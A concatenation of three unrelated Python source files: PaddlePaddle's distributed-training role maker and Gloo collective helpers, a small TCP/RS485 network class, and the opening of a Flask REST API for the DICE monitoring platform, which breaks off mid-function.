def __get_default_iface_from_interfaces(self):
"""
get default physical interface
"""
res = os.popen("ip -f inet addr | awk NR%3==1").read().strip().split(
"\n")
for item in res:
if "BROADCAST" in item:
return item.split(":")[1].strip()
return "lo"
def barrier(self, comm_world):
"""
dummy barrier, do nothing
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
self._worker_comm.barrier()
elif comm_world == "server":
self._server_comm.barrier()
else:
self._nodes_comm.barrier()
def all_reduce(self, input, mode="sum", comm_world="worker"):
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
input = np.array(input)
input_shape = input.shape
input_list = input.reshape(-1).tolist()
self.barrier(comm_world)
if comm_world == "worker":
ans = self._worker_comm.all_reduce(input_list, mode)
elif comm_world == "server":
ans = self._server_comm.all_reduce(input_list, mode)
else:
ans = self._nodes_comm.all_reduce(input_list, mode)
output = np.array(ans).reshape(input_shape)
return output
def all_gather(self, input, comm_world="worker"):
"""
dummy all gather, do nothing
Args:
obj(any): obj to do all gather
"""
if not self._is_initialized:
warnings.warn(self._err_init)
return input
if comm_world not in self._comm_world:
raise ValueError(self._err_world)
if comm_world == "worker":
output = self._worker_comm.all_gather(input)
elif comm_world == "server":
output = self._server_comm.all_gather(input)
else:
output = self._nodes_comm.all_gather(input)
return output
class RoleMakerBase(object):
"""
RoleMakerBase is a base class for assigning a role to current process
in distributed training.
A paddle developer can implement RoleMakerBase to design a role maker
for worker or pserver assignment.
"""
def __init__(self):
self._worker_endpoints = []
self._server_endpoints = []
self._role_is_generated = False
self._role = None
self._current_id = -1
# for heter parameter server mode
self._heter_trainer_endpoints = []
self._heter_trainer_device = "CPU"
self._is_heter_parameter_server_mode = False
def _is_worker(self):
"""
return is_worker() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_server(self):
"""
return is_server() of current process
"""
raise NotImplementedError("Please implement this method in child class")
def _is_first_worker(self):
"""
Check whether the node is the first instance of worker.
Returns:
bool: True if this is the first node of worker,
False if not.
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_num(self):
"""
Get current total worker number.
Returns:
int: worker number
"""
raise NotImplementedError("Please implement this method in child class")
def _server_num(self):
"""
Get current total server number.
Returns:
int: server number
"""
raise NotImplementedError("Please implement this method in child class")
def _worker_index(self):
"""
Get current worker id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _server_index(self):
"""
Get current server id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _role_id(self):
"""
Get current id.
Returns:
int: node id
"""
raise NotImplementedError("Please implement this method in child class")
def _node_num(self):
"""
Get the training node number
Returns:
int: node num
"""
raise NotImplementedError("Please implement this method in child class")
def _get_trainer_endpoints(self):
"""
return trainer endpoints
"""
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
return pserver endpoints
"""
return self._server_endpoints
def to_string(self):
return "role: {}, current_id: {}, worker_endpoints: {}, server_endpoints: {}".format(
self._role, self._current_id, self._worker_endpoints,
self._server_endpoints)
def _all_gather(self, input, comm_world="worker"):
print("warning: RoleMakerBase does not have all gather worker.")
return None
def _all_reduce(self, input, mode="sum", comm_world="worker"):
"""
Args:
input(list/numpy.array): array of one dim
output(list/numpy.array): array of one dim
mode(str): "sum" or "min" or "max"
"""
print("warning: RoleMakerBase does not have all reduce worker.")
return None
def _barrier(self, comm_world):
"""
barrier between trainers if current role is TRAINER
"""
print("warning: RoleMakerBase does not have barrier worker.")
def _is_heter_worker(self):
"""
Return is_heter_worker() of current process
"""
warnings.warn("RoleMakerBase does not have function: _is_heter_worker.")
return False
def _heter_worker_num(self):
"""
Get current total heter-worker number.
Returns:
int: heter_worker number
"""
warnings.warn(
"RoleMakerBase does not have function: _heter_worker_num.")
return 0
def _get_heter_worker_endpoints(self):
"""
Returns:
string: all heter_trainers'endpoints
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints
def _get_heter_worker_endpoint(self):
"""
Returns:
int: corresponding heter_trainer's endpoint
e.g: if we have 4 cpu-trainer(default), 2 gpu-trainer(heter)
then No.0 and No.2 cpu-trainer will work with No.0 gpu-trainer
and No.1 and No.3 cpu-trainer will work with No.1 gpu-trainer
"""
assert self._heter_trainer_endpoints != [], "Heter Worker Endpoints Not initialized"
return self._heter_trainer_endpoints[(self._current_id) %
self._heter_worker_num()]
class PaddleCloudRoleMaker(RoleMakerBase):
def __init__(self, is_collective=False, **kwargs):
super(PaddleCloudRoleMaker, self).__init__()
self._is_collective = is_collective
self._non_distributed = False
self._kwargs = kwargs
self._role_is_generated = False
self._server_endpoints = []
self._worker_endpoints = []
self._gloo = Gloo() # gloo instance
def _barrier(self, comm_world):
self._gloo.barrier(comm_world)
def _all_gather(self, input, comm_world="worker"):
return self._gloo.all_gather(input, comm_world)
def _all_reduce(self, input, mode="sum", comm_world="worker"):
return self._gloo.all_reduce(input, mode, comm_world)
def _is_worker(self):
"""
whether current process is worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER
def _is_server(self):
"""
whether current process is server
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.SERVER
def _is_first_worker(self):
"""
whether current process is worker of rank 0
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.WORKER and self._current_id == 0
def _worker_index(self):
"""
get index of current worker
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _server_index(self):
"""
get index of current server
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _role_id(self):
"""
get index of current node
"""
if not self._role_is_generated:
self._generate_role()
return self._current_id
def _worker_num(self):
"""
retrun the current number of worker
"""
if not self._role_is_generated:
self._generate_role()
return self._trainers_num
def _server_num(self):
"""
return the current number of server
"""
if not self._role_is_generated:
self._generate_role()
return len(self._get_pserver_endpoints(
)) if self._get_pserver_endpoints() is not None else 0
def _node_num(self):
"""
return the training node number
"""
if not self._role_is_generated:
self._generate_role()
return self._nodes_num
def _get_trainer_endpoints(self):
"""
get endpoint of all trainers
"""
if not self._role_is_generated:
self._generate_role()
return self._worker_endpoints
def _get_pserver_endpoints(self):
"""
get endpoint of all pservers
"""
if not self._role_is_generated:
self._generate_role()
return self._server_endpoints
def _is_non_distributed(self):
"""
Return True if indispensable environment for fleetrun is not found
(use python-run to launch fleet-code directly)
"""
if not self._role_is_generated:
self._generate_role()
return self._non_distributed
def _heter_worker_num(self):
"""
get heter worker nums
"""
if not self._role_is_generated:
self._generate_role()
return self._heter_trainers_num
def _is_heter_worker(self):
"""
whether current process is heter worker
"""
if not self._role_is_generated:
self._generate_role()
return self._role == Role.HETER_WORKER
def _ps_env(self):
# Environment variable PADDLE_PSERVERS_IP_PORT_LIST must be set
# format: string(ip:port,ip:port), eg. 127.0.0.1:6001,127.0.0.1:6002
self._server_endpoints = os.getenv("PADDLE_PSERVERS_IP_PORT_LIST", None)
if self._server_endpoints is None:
# back to non_distributed execution.
self._server_endpoints = ""
self._trainers_num = 1
self._role = Role.WORKER
self._current_id = 0
self._nodes_num = 1
self._heter_trainers_num = 0
self._heter_trainer_endpoints = None
self._non_distributed = True
return
self._server_endpoints = self._server_endpoints.split(",")
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS", None)
if self._worker_endpoints != None:
self._worker_endpoints = self._worker_endpoints.split(",")
else:
self._worker_endpoints = []
trainers_num = os.getenv("PADDLE_TRAINERS_NUM", None)
if trainers_num == None:
raise ValueError(
"Can not find PADDLE_TRAINERS_NUM, please check your environment."
)
trainers_num = int(trainers_num)
training_role = os.getenv("TRAINING_ROLE", None)
if training_role == None:
raise ValueError(
"Can not find TRAINING_ROLE, please check your environment.")
if training_role not in ["TRAINER", "PSERVER", "HETER_TRAINER"]:
raise ValueError(
"TRAINING_ROLE must be PSERVER or TRAINER or HETER_TRAINER, but get {}, please check your environment.".
format(training_role))
# For heter parameter server env setting
heter_trainer_eplist = os.getenv("PADDLE_HETER_TRAINER_IP_PORT_LIST",
"")
if heter_trainer_eplist != "":
try:
heter_trainer_eplist = os.environ[
"PADDLE_HETER_TRAINER_IP_PORT_LIST"].split(",")
except:
raise ValueError(
"Can not Find PADDLE_HETER_TRAINER_IP_PORT_LIST in env or its format doesn't match the requirement: 'IP:PORT,IP:PORT' ."
)
self._is_heter_parameter_server_mode = True
heter_trainers_num = len(heter_trainer_eplist)
else:
self._is_heter_parameter_server_mode = False
heter_trainers_num = 0
if training_role == "TRAINER":
role = Role.WORKER
current_id = os.getenv("PADDLE_TRAINER_ID", None)
if current_id == None:
raise ValueError(
"Can not find PADDLE_TRAINER_ID, please check your environment."
)
current_id = int(current_id)
if len(self._worker_endpoints) > 0:
self._cur_endpoint = self._worker_endpoints[current_id]
elif training_role == "PSERVER":
role = Role.SERVER
port = os.getenv("PADDLE_PORT", None)
if port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
ip = os.getenv("POD_IP", None)
if ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
self._cur_endpoint = ip + ":" + port
current_id = self._server_endpoints.index(self._cur_endpoint)
elif training_role == "HETER_TRAINER":
role = Role.HETER_WORKER
cur_port = os.getenv("PADDLE_PORT", None)
if cur_port == None:
raise ValueError(
"Can not find PADDLE_PORT, please check your environment.")
cur_ip = os.getenv("POD_IP", None)
if cur_ip == None:
raise ValueError(
"Can not find POD_IP, please check your environment.")
curr_endpoint = ":".join([cur_ip, cur_port])
current_id = heter_trainer_eplist.index(curr_endpoint)
self._trainers_num = trainers_num
self._role = role
self._current_id = current_id
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
self._heter_trainers_num = heter_trainers_num
self._heter_trainer_endpoints = heter_trainer_eplist
def _collective_env(self):
self._current_id = int(os.getenv("PADDLE_TRAINER_ID", "0"))
self._training_role = os.getenv("PADDLE_TRAINING_ROLE", "TRAINER")
assert (self._training_role == "TRAINER")
self._role = Role.WORKER
self._worker_endpoints = os.getenv("PADDLE_TRAINER_ENDPOINTS")
self._cur_endpoint = os.getenv("PADDLE_CURRENT_ENDPOINT")
if self._worker_endpoints is None:
# back to non_distributed execution.
self._worker_endpoints = "127.0.0.1:6170"
self._cur_endpoint = self._worker_endpoints
self._non_distributed = True
self._worker_endpoints = self._worker_endpoints.split(",")
self._trainers_num = len(self._worker_endpoints)
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _gloo_init(self):
# PADDLE_WITH_GLOO 1: trainer barrier, 2: all barrier
use_gloo = int(os.getenv("PADDLE_WITH_GLOO", "0"))
if use_gloo not in [1, 2]:
return
# PADDLE_GLOO_RENDEZVOUS 1: HDFS 2: FILE 3: HTTP
rendezvous_type = int(os.getenv("PADDLE_GLOO_RENDEZVOUS", "0"))
prefix = os.getenv("SYS_JOB_ID", "")
if rendezvous_type not in [
Gloo.RENDEZVOUS.HDFS, Gloo.RENDEZVOUS.HTTP, Gloo.RENDEZVOUS.FILE
]:
raise ValueError(self._gloo._err_type)
need_init_all = True if use_gloo == 2 else False
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
dfs_name = os.getenv("PADDLE_GLOO_FS_NAME", "")
dfs_ugi = os.getenv("PADDLE_GLOO_FS_UGI", "")
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.name": dfs_name,
"dfs.ugi": dfs_ugi,
"dfs.path": dfs_path,
"store.prefix": prefix,
}
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
start_http_server = False
manager = Manager()
http_server_d = manager.dict()
http_server_d["running"] = False
if self._is_collective:
ep_rank_0 = self._worker_endpoints[0]
if self._is_first_worker():
start_http_server = True
else:
ep_rank_0 = os.getenv("PADDLE_GLOO_HTTP_ENDPOINT", "")
if self._is_server() and self._server_index() == 0:
start_http_server = True
ip, port = ep_rank_0.split(':')
kwargs = {
"http.host": ip,
"http.port": port,
"store.prefix": prefix,
'start_http_server': start_http_server,
'http_server_d': http_server_d,
}
else:
dfs_path = os.getenv("PADDLE_GLOO_FS_PATH", "")
kwargs = {
"dfs.path": dfs_path,
"store.prefix": prefix,
}
if rendezvous_type == Gloo.RENDEZVOUS.HDFS:
type = "HDFS"
elif rendezvous_type == Gloo.RENDEZVOUS.HTTP:
type = "HTTP"
else:
type = "FILE"
print("Gloo init with {}: need_init_all: {}, args: {}".format(
type, need_init_all, kwargs))
self._gloo.init(
rendezvous=rendezvous_type,
role=self._role,
role_id=self._role_id(),
worker_num=self._worker_num(),
server_num=self._server_num(),
need_init_all=need_init_all,
kwargs=kwargs)
if rendezvous_type == Gloo.RENDEZVOUS.HTTP:
http_server_d['running'] = False
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._ps_env()
else:
self._collective_env()
self._role_is_generated = True
if not paddle.fluid.framework.in_dygraph_mode():
self._gloo_init()
class UserDefinedRoleMaker(PaddleCloudRoleMaker):
def __init__(self, is_collective=False, init_gloo=False, **kwargs):
super(UserDefinedRoleMaker, self).__init__(
is_collective=is_collective, init_gloo=init_gloo, **kwargs)
self._init_gloo = init_gloo
def _user_defined_ps_env(self):
self._server_endpoints = self._kwargs.get("server_endpoints")
self._worker_endpoints = self._kwargs.get("worker_endpoints", [])
self._trainers_num = self._kwargs.get("worker_num", 0)
if self._trainers_num == 0:
assert (len(self._worker_endpoints) > 0)
self._trainers_num = len(self._worker_endpoints)
self._role = self._kwargs.get("role")
self._current_id = self._kwargs.get("current_id")
if self._role == Role.WORKER and len(
self._worker_endpoints) > self._current_id:
self._cur_endpoint = self._worker_endpoints[self._current_id]
elif self._role == Role.SERVER:
self._cur_endpoint = self._server_endpoints[self._current_id]
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _user_defined_collective_env(self):
self._worker_endpoints = self._kwargs.get("worker_endpoints")
self._current_id = self._kwargs.get("current_id")
self._trainers_num = len(self._worker_endpoints)
self._training_role = Role.WORKER
self._nodes_num = len(
set([x.split(':')[0] for x in self._worker_endpoints]))
def _generate_role(self):
"""
generate role for role maker
"""
if not self._role_is_generated:
if not self._is_collective:
self._user_defined_ps_env()
else:
self._user_defined_collective_env()
self._role_is_generated = True
|
network.py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Kevin Schlosser
import socket
import threading
from . import rs485
class Network(object):
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((ip, port))
self.rs485 = rs485.RS485(self)
self.rs485.start()
self._read_event = threading.Event()
self._read_thread = threading.Thread(target=self._read_loop)
self._read_thread.daemon = True
self._read_thread.start()
def recv(self):
pass
def send(self):
pass
def _read_loop(self):
# this will actually loop forever or until the program is stopped.
# a packet is always returned.
for packet in self.rs485:
packet.message_type.send(packet)
def write(self, packet):
self.rs485.write(packet)
def stop(self):
self.rs485.stop()
|
pyDMON.py
|
"""
Copyright 2015, Institute e-Austria, Timisoara, Romania
http://www.ieat.ro/
Developers:
* Gabriel Iuhasz, iuhasz.gabriel@info.uvt.ro
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
#!flask/bin/python
from flask.ext.restplus import Api, Resource, fields
from flask import Flask, jsonify
from flask import request
from flask import redirect
from flask import make_response
from flask import abort
from flask import url_for
from flask import render_template
from flask import Response
from flask import send_file
from flask import send_from_directory
from flask import copy_current_request_context
import os
import sys
import signal
from flask_sqlalchemy import SQLAlchemy
from datetime import datetime
import jinja2
import requests
import shutil
# from werkzeug import secure_filename #unused
from urlparse import urlparse
# DICE Imports
from pyESController import *
from pysshCore import *
from dmonPerfMon import *
from app import *
from pyUtil import *
# from threadRequest import *
from greenletThreads import *
# import Queue
# from threading import Thread
import tempfile
import requests
import psutil
from logging.handlers import RotatingFileHandler
import time
from datetime import datetime
import glob
import multiprocessing
#from threadRequest import getStormLogs
from artifactRepository import *
import uuid
from dmonasyncquery import asyncQuery
# directory Location
outDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'output')
tmpDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
cfgDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'conf')
baseDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'db')
pidDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'pid')
logDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logs')
credDir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'keys')
tempDir = tempfile.gettempdir()
esDir = '/opt/elasticsearch'
lsCDir = '/etc/logstash/conf.d/'
gbgProcessList=[]
global gbgProcessList
# D-Mon Supported frameworks
lFrameworks = ['hdfs', 'yarn', 'spark', 'storm', 'cassandra', 'mongodb', 'cep']
# app = Flask("D-MON")
# api = Api(app, version='0.2.0', title='DICE MONitoring API',
# description='RESTful API for the DICE Monitoring Platform (D-MON)',
# )
# changes the descriptor on the Swagger WUI and appends to api /dmon and then /v1
# dmon = api.namespace('dmon', description='D-MON operations')
#Initialize detect service
servDet = DetectBDService()
# argument parser
dmonAux = api.parser()
dmonAux.add_argument('redeploy', type=str, required=False,
help='Redeploys configuration of Auxiliary components on the specified node.')
dmonAuxAll = api.parser()
dmonAuxAll.add_argument('redeploy-all', type=str, required=False,
help='Redeploys configuration of Auxiliary components on all nodes.')
# pQueryES.add_argument('task',type=str, required=True, help='The task details', location='form')
# descripes universal json @api.marshal_with for return or @api.expect for payload model
queryES = api.model('query details Model', {
'fname': fields.String(required=False, default="output", description='Name of output file.'),
'size': fields.Integer(required=True, default=500, description='Number of record'),
'ordering': fields.String(required=True, default='desc', description='Ordering of records'),
'queryString': fields.String(required=True, default="host:\"dice.cdh5.s4.internal\" AND serviceType:\"dfs\""
, description='ElasticSearc Query'),
'tstart': fields.Integer(required=True, default="now-1d", description='Start Date'),
'tstop': fields.Integer(required=False, default="None", description='Stop Date'),
'metrics': fields.List(fields.String(required=False, default=' ', description='Desired Metrics')),
'index': fields.String(required=False, default='logstash-*', description='Name of ES Core index')
})
queryESEnhanced = api.model('aggregated query details Model', {
'fname': fields.String(required=False, default="output", description='Name of output file.'),
'interval': fields.String(required=False, default="10s", description='Aggregation interval.'),
'size': fields.Integer(required=True, default=0, description='Number of record'),
'tstart': fields.Integer(required=True, default="now-1d", description='Start Date'),
'tstop': fields.Integer(required=False, default="now", description='Stop Date'),
'aggregation': fields.String(required=False, default="system", description='Aggregation'),
'index': fields.String(required=False, default='logstash-*', description='Name of ES Core index')
})
#Nested ENhanced JSON input
dDMONQueryEnh = api.model('queryESEnh Model', {
'DMON':fields.Nested(queryESEnhanced, description="Query details")
})
# Nested JSON input
dMONQuery = api.model('queryES Model', {
'DMON': fields.Nested(queryES, description="Query details")
})
nodeSubmitCont = api.model('Submit Node Model Info', {
'NodeName': fields.String(required=True, description="Node FQDN"),
'NodeIP': fields.String(required=True, description="Node IP"),
'NodeOS': fields.String(required=False, description="Node OS"),
'key': fields.String(required=False, description="Node Pubilc key"),
'username': fields.String(required=False, description="Node User Name"),
'password': fields.String(required=False, description="Node Password"),
'LogstashInstance': fields.String(required=False, description='Logstash Server Endpoint')
})
nodeDelList = api.model('Delete node list', {
'Nodes': fields.List(fields.String(required=True, default='node_name', description='Node FQDN'))
})
nodeSubmit = api.model('Submit Node Model', {
'Nodes': fields.List(fields.Nested(nodeSubmitCont, required=True, description="Submit Node details"))
})
esCore = api.model('Submit ES conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, default='unknown', description='Host OS'),
'NodeName': fields.String(required=True, description='ES Host Name'),
'NodePort': fields.Integer(required=False, default=9200, description='ES Port'),
'ESClusterName': fields.String(required=True, description='ES Host Name'),
'ESCoreHeap': fields.String(required=False, default='4g', description='ES Heap size'),
'MasterNode': fields.Boolean(required=False, description='ES Master'),
'DataNode': fields.Boolean(required=False, description='ES Data'),
'NumOfShards': fields.Integer(required=False, default=1, description='Number of shards'),
'NumOfReplicas': fields.Integer(required=False, default=0, description='Number of replicas'),
'FieldDataCacheSize': fields.String(required=False, default='20%', description='Field cache size'),
'FieldDataCacheExpires': fields.String(required=False, default='6h', description='Field cache expiration'),
'FieldDataCacheFilterSize': fields.String(required=False, default='20%', description='Field cache filter size'),
'FieldDataCacheFilterExpires': fields.String(required=False, default='6h',
description='Field cache filter expiration'),
'IndexBufferSize': fields.String(required=False, default='30%', description='Index buffer size'),
'MinShardIndexBufferSize': fields.String(required=False, default='12mb', description='Min Shard index buffer size'),
'MinIndexBufferSize': fields.String(required=False, default='96mb', description='Min index buffer size'),
'ESCoreDebug': fields.Boolean(required=False, default=1, description='Debug logs')
})
kbCore = api.model('Submit KB conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, default='unknown', description='Host OS'),
'KBPort': fields.Integer(required=False, default=5601, description='KB Port'),
})
nodeUpdate = api.model('Update Node Model Info', {
'IP': fields.String(required=True, description="Node IP"),
'OS': fields.String(required=False, description="Node OS"),
'Key': fields.String(required=False, description="Node Public key"),
'User': fields.String(required=False, description="Node User Name"),
'Password': fields.String(required=False, description="Node Password"),
'LogstashInstance': fields.String(required=False, description='Logstash Server Endpoint')
})
nodeRoles = api.model('Update Node Role Model Info', {
'Roles': fields.List(fields.String(required=True, default='yarn', description='Node Roles'))
})
listNodesRolesInternal = api.model('Update List Node Role Model Info Nested', {
"NodeName": fields.String(required=True, description="Node FQDN"),
"Roles": fields.List(fields.String(required=True, default='yarn', description='Node Roles'))
})
listNodeRoles = api.model('Update List Node Role Model Info', {
"Nodes": fields.List(
fields.Nested(listNodesRolesInternal, required=True, description='List of nodes and their roles'))
})
lsCore = api.model('Submit LS conf', {
'HostFQDN': fields.String(required=True, description='Host FQDN'),
'IP': fields.String(required=True, description='Host IP'),
'OS': fields.String(required=False, description='Host OS'),
'LPort': fields.Integer(required=False, default=5000, description='Lumberjack port'),
'udpPort': fields.String(required=False, default=25826, description='UDP Collectd Port'),
'LSCoreHeap': fields.String(required=False, default='512m', description='Heap size for LS server'),
'LSCoreWorkers': fields.String(required=False, default='4', description='Number of workers for LS server'),
'ESClusterName': fields.String(required=True, default='diceMonit', description='ES cluster name'),
# TODO: use as foreign key same as ClusterName in esCore
'LSCoreStormEndpoint': fields.String(required=False, default='None', description='Storm REST Endpoint'),
'LSCoreStormPort': fields.String(required=False, default='None', description='Storm REST Port'),
'LSCoreStormTopology': fields.String(required=False, default='None', description='Storm Topology ID'),
'LSCoreSparkEndpoint': fields.String(required=False, default='None', description='Spark REST Endpoint'),
'LSCoreSparkPort': fields.String(required=False, default='None', description='Spark REST Port'),
'Index': fields.String(required=False, default='logstash', description='ES index name to be used')
})
# monNodes = api.model('Monitored Nodes',{
# 'Node':fields.List(fields.Nested(nodeDet, description="FQDN and IP of nodes"))
# })
# nodeDet = api.model('Node Info',{
# 'FQDN' : field
# })#[{'FQDN':'IP'}]
certModel = api.model('Update Cert', {
'Certificate': fields.String(required=False, description='Certificate')
})
resInterval = api.model('Polling interval', {
'Spark': fields.String(required=False, default='15', description='Polling period for Spark metrics'),
'Storm': fields.String(required=False, default='60', description='Polling period for Storm metrics'),
'System': fields.String(required=False, default='15', description='Polling period for System metrics'),
'YARN': fields.String(required=False, default='15', description='Polling period for YARN metrics')
})
yarnHistorySettings = api.model('Settings for Yarn history server', {
'NodeIP': fields.String(required=False, default='127.0.0.1', description='History Server IP'),
'NodePort': fields.Integer(required=False, default=19888, description='History Server Port'),
'Polling': fields.String(required=False, default=30, description='History Server Polling Period')
})
mongoDBConf = api.model('Settings for MongoDB', {
'MongoHost': fields.String(required=True, default='127.0.0.1', description='MongoDB Host'),
'MongoPort': fields.String(required=True, default='27017', description='MongoDB Port'),
'MongoUser': fields.String(required=False, default='', description='MongoDB User'),
'MongoPassword': fields.String(required=False, default='27017', description='MongoDB Password'),
'MongoDBs': fields.String(required=False, default='admin', description='MongoDBs')
})
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(baseDir, 'dmon.db')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db.create_all()
@dmon.route('/v1/log')
class DmonLog(Resource):
def get(self):
try:
logfile = open(os.path.join(logDir, 'dmon-controller.log'), 'r')
except EnvironmentError:
response = jsonify({'EnvError': 'file not found'})
response.status_code = 500
return response
return Response(logfile, status=200, mimetype='text/plain')
@dmon.route('/v1/observer/applications')
class ObsApplications(Resource):
def get(self):
qApps = db.session.query(dbApp.appName, dbApp.appVersion, dbApp.startTime, dbApp.stopTime, dbApp.jobID).all()
appDict = {}
for a in qApps:
appDict[a[0]] = {'ver': a[1], 'start': a[2], 'stop': a[3], 'status': a[4]}
response = jsonify(appDict)
response.status_code = 200
return response
@dmon.route('/v1/observer/applications/<appID>')
@api.doc(params={'appID': 'Application identification'})
class ObsAppbyID(Resource):
def get(self, appID):
qApp = dbApp.query.filter_by(appName=appID).first()
if qApp is None:
response = jsonify({'Status': 'Warning', 'Message': appID + ' not registered'})
response.status_code = 404
app.logger.warning('[%s] : [INFO] Application %s is not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), )
return response
# todo sync with dev brach to add missing code
response = jsonify({qApp.appName: {'ver': qApp.appVersion, 'start': qApp.startTime, 'stop': qApp.stopTime, 'status': qApp.jobID}})
response.status_code = 200
return response
@dmon.route('/v1/observer/nodes')
class NodesMonitored(Resource):
# @api.marshal_with(monNodes) # this is for response
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
app.logger.info('[%s] : [INFO] Nodes - > %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
# print >> sys.stderr, nl[0]
nodeDict.update({nl[0]: nl[1]})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node list is: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
return response
@dmon.route('/v1/observer/nodes/<nodeFQDN>')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class NodeStatus(Resource):
def get(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode is None:
response = jsonify({'Status': 'Node ' + nodeFQDN + ' not found!'})
response.status_code = 404
app.logger.warn('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeFQDN))
return response
else:
response = jsonify({nodeFQDN: {
'Status': qNode.nStatus,
'IP': qNode.nodeIP,
'Monitored': qNode.nMonitored,
'OS': qNode.nodeOS,
'LSInstance': qNode.nLogstashInstance
}})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node info -> Status:%s, IP:%s, Monitored:%s, OS:%s, LSInstance: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qNode.nStatus,
qNode.nodeIP, qNode.nMonitored, qNode.nodeOS, qNode.nLogstashInstance)
return response
@dmon.route('/v1/observer/nodes/<nodeFQDN>/roles')
@api.doc(params={'nodeFQDN': 'Nodes FQDN'})
class NodeStatusServices(Resource):
def get(self, nodeFQDN):
qNode = dbNodes.query.filter_by(nodeFQDN=nodeFQDN).first()
if qNode.nRoles == 'unknown':
response = jsonify({'Status': 'No known service on ' + nodeFQDN})
response.status_code = 200
app.logger.warning('[%s] : [WARN] No known service on %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeFQDN))
return response
else:
roleList = qNode.nRoles
response = jsonify({'Roles': roleList.split()})
response.status_code = 200
app.logger.info('[%s] : [INFO] Node roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(roleList.split()))
return response
@dmon.route('/v1/observer/query/<ftype>')
@api.doc(params={'ftype': 'Output type'})
class QueryEsCore(Resource):
# @api.doc(parser=pQueryES) #inst parser
# @api.marshal_with(dMONQuery) # this is for response
@api.expect(dMONQuery) # this is for payload
def post(self, ftype):
# args = pQueryES.parse_args()#parsing query arguments in URI
supportType = ["csv", "json", "plain", "oslc"]
if ftype not in supportType:
response = jsonify({'Supported types': supportType, "Submitted Type": ftype})
response.status_code = 415
app.logger.warn('[%s] : [WARN] Unsuported output type %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), ftype)
return response
if ftype == 'oslc' and 'collectd' not in request.json['DMON']['queryString']:
response = jsonify({'Status': 'Unsuported query',
'Message': 'Only system metrics supported for oslc'})
response.status_code = 409
return response
if request.json is None:
response = jsonify({'Status': 'Empty payload',
'Message': 'Request has empty payload'})
response.status_code = 417
app.logger.error('[%s] : [ERROR] Empty payload received for query, returned error 417',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'queryString' not in request.json['DMON']:
response = jsonify({'Status': 'No queryString',
'Message': 'Query string not found in payload'})
response.status_code = 404
